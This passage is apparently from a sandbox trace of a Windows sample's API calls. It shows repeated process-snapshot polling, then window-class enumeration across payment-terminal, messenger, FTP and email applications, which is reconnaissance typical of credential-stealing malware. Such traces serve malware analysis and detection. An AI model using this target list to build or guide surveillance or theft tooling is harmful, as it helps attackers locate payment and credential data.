th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.180] Sleep (dwMilliseconds=0x64) [0289.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0289.194] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.394] Sleep (dwMilliseconds=0x64) [0289.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0289.454] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.595] Sleep (dwMilliseconds=0x64) [0289.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0289.659] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.835] Sleep (dwMilliseconds=0x64) [0289.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0289.877] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.948] Sleep (dwMilliseconds=0x64) [0290.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0290.038] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.162] Sleep (dwMilliseconds=0x64) [0290.206] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0290.266] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.362] Sleep (dwMilliseconds=0x64) [0290.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0290.382] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.486] Sleep (dwMilliseconds=0x64) [0290.530] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0290.540] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.645] Sleep (dwMilliseconds=0x64) [0290.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0290.696] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.824] Sleep (dwMilliseconds=0x64) [0290.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0290.861] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.968] Sleep (dwMilliseconds=0x64) [0291.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.027] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.134] Sleep (dwMilliseconds=0x64) [0291.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.197] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.274] Sleep (dwMilliseconds=0x64) [0291.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.289] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.408] Sleep (dwMilliseconds=0x64) [0291.455] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.464] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.570] Sleep (dwMilliseconds=0x64) [0291.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.635] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.710] Sleep (dwMilliseconds=0x64) [0291.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.728] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.839] Sleep (dwMilliseconds=0x64) [0291.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0291.906] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.022] Sleep (dwMilliseconds=0x64) [0292.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0292.157] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.228] Sleep (dwMilliseconds=0x64) [0292.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0292.274] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.475] Sleep (dwMilliseconds=0x64) [0292.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0292.538] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.656] Sleep (dwMilliseconds=0x64) [0292.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0292.680] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.736] Sleep (dwMilliseconds=0x64) [0292.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0292.757] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.967] Sleep (dwMilliseconds=0x64) [0293.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0293.024] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.127] Sleep (dwMilliseconds=0x64) [0293.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0293.159] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.215] Sleep (dwMilliseconds=0x64) [0293.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0293.243] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.355] Sleep (dwMilliseconds=0x64) [0293.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0293.431] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.530] Sleep (dwMilliseconds=0x64) [0293.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0293.584] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.641] Sleep (dwMilliseconds=0x64) [0293.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0293.666] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.775] Sleep (dwMilliseconds=0x64) [0293.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0293.827] Process32First (in: hSnapshot=0x2134, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.934] Sleep (dwMilliseconds=0x64) [0293.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0294.037] Process32First (in: hSnapshot=0x2170, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.191] Sleep (dwMilliseconds=0x64) [0294.240] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0294.254] Process32First (in: hSnapshot=0x2120, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.331] Sleep (dwMilliseconds=0x64) [0294.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff0 [0294.418] Process32First (in: hSnapshot=0x1ff0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.526] Sleep (dwMilliseconds=0x64) [0294.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff0 [0294.564] Process32First (in: hSnapshot=0x1ff0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.633] Sleep (dwMilliseconds=0x64) [0294.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0294.699] Process32First (in: hSnapshot=0x2120, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.820] Sleep (dwMilliseconds=0x64) [0294.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0294.838] Process32First (in: hSnapshot=0x2120, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.027] Sleep (dwMilliseconds=0x64) [0295.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff0 [0295.079] Process32First (in: hSnapshot=0x1ff0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.322] Sleep (dwMilliseconds=0x64) [0295.392] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0295.401] Process32First (in: hSnapshot=0x2120, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.477] Sleep (dwMilliseconds=0x64) [0295.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0295.490] Process32First (in: hSnapshot=0x2120, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.646] Sleep (dwMilliseconds=0x64) Thread: id = 50 os_tid = 0x10a0 [0097.008] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) returned 1 [0097.008] GetClassNameA (in: hWnd=0x100ec, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0097.008] GetClassNameA (in: hWnd=0x1014a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0097.008] GetClassNameA (in: hWnd=0x1010e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0097.009] GetClassNameA (in: hWnd=0x1011c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x10120, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x10122, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x1011e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x1011a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x10118, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0097.009] GetClassNameA (in: hWnd=0x10116, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x10114, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.009] GetClassNameA (in: hWnd=0x10178, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.009] GetClassNameA (in: hWnd=0x1016a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.009] GetClassNameA (in: hWnd=0x1015a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.009] GetClassNameA (in: hWnd=0x10112, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.009] GetClassNameA (in: hWnd=0x10102, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0097.009] GetClassNameA (in: hWnd=0x10198, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0097.009] GetClassNameA (in: hWnd=0x10196, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00000000061A2330-1a4b5f2") returned 36 [0097.009] GetClassNameA (in: hWnd=0x1018e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0097.009] GetClassNameA (in: hWnd=0x10188, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0097.010] GetClassNameA (in: hWnd=0x100d8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100b2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100b6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100c2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100cc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100d0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x10098, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100a6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100ca, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x1008c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0097.010] GetClassNameA (in: hWnd=0x20030, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA00814120") returned 20 [0097.010] GetClassNameA (in: hWnd=0x100e6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.010] GetClassNameA (in: hWnd=0x100da, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0097.010] GetClassNameA (in: hWnd=0x10348, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="localRealityBankwnd") returned 19 [0097.010] GetClassNameA (in: hWnd=0x20300, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.010] GetClassNameA (in: hWnd=0x2030c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-007A8B38-820ac57") returned 28 [0097.010] GetClassNameA (in: hWnd=0x3032c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0097.011] GetClassNameA (in: hWnd=0x2025a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0097.011] GetClassNameA (in: hWnd=0x20240, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0097.011] GetClassNameA (in: hWnd=0x2021c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.011] GetClassNameA (in: hWnd=0x301fa, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.011] GetClassNameA (in: hWnd=0x20336, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0097.011] GetClassNameA (in: hWnd=0x10340, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="likelyFinaloutwnd") returned 17 [0097.011] GetClassNameA (in: hWnd=0x1033a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="utg2_wnd") returned 8 [0097.011] GetClassNameA (in: hWnd=0x40088, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0097.011] GetClassNameA (in: hWnd=0x1034a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="kitchenBoxinsteadwin") returned 20 [0097.011] GetClassNameA (in: hWnd=0x10334, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="spcwin_") returned 7 [0097.011] GetClassNameA (in: hWnd=0x10332, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="spgagentservicewin") returned 18 [0097.011] GetClassNameA (in: hWnd=0x1032a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="omnipos_wnd") returned 11 [0097.011] GetClassNameA (in: hWnd=0x10324, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="isspos") returned 6 [0097.011] GetClassNameA (in: hWnd=0x102dc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="trilliancls") returned 11 [0097.012] GetClassNameA (in: hWnd=0x10322, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="mxslipstream_class") returned 18 [0097.012] GetClassNameA (in: hWnd=0x1031a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="fposwindow") returned 10 [0097.012] GetClassNameA (in: hWnd=0x10312, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="edcsvr_class") returned 12 [0097.012] GetClassNameA (in: hWnd=0x1030e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="creditservice_wnd") returned 17 [0097.012] GetClassNameA (in: hWnd=0x102ce, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="skype") returned 5 [0097.012] GetClassNameA (in: hWnd=0x1030a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="centralcreditcard_cls") returned 21 [0097.012] GetClassNameA (in: hWnd=0x10304, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ccv_server_class") returned 16 [0097.012] GetClassNameA (in: hWnd=0x10302, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="aldeloclass") returned 11 [0097.012] GetClassNameA (in: hWnd=0x102be, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="pidgin_") returned 7 [0097.012] GetClassNameA (in: hWnd=0x102fa, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="afr38") returned 5 [0097.012] GetClassNameA (in: hWnd=0x102f4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0097.012] GetClassNameA (in: hWnd=0x4009c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="accupos_app") returned 11 [0097.012] GetClassNameA (in: hWnd=0x102ae, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="notepad_wnd") returned 11 [0097.012] GetClassNameA (in: hWnd=0x102f0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="winscp_app") returned 10 [0097.013] GetClassNameA (in: hWnd=0x102e6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="whatsapp_app") returned 12 [0097.013] GetClassNameA (in: hWnd=0x102e8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="webdrive_app") returned 12 [0097.013] GetClassNameA (in: hWnd=0x102da, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="smartftp_cls") returned 12 [0097.013] GetClassNameA (in: hWnd=0x102d8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="thunderbird_cls") returned 15 [0097.013] GetClassNameA (in: hWnd=0x102c4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0097.013] GetClassNameA (in: hWnd=0x102c2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="scriptftp_cls") returned 13 [0097.013] GetClassNameA (in: hWnd=0x102b6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="operamail_app") returned 13 [0097.013] GetClassNameA (in: hWnd=0x1027e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="filezilla_window") returned 16 [0097.013] GetClassNameA (in: hWnd=0x102ac, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ncftp_class") returned 11 [0097.013] GetClassNameA 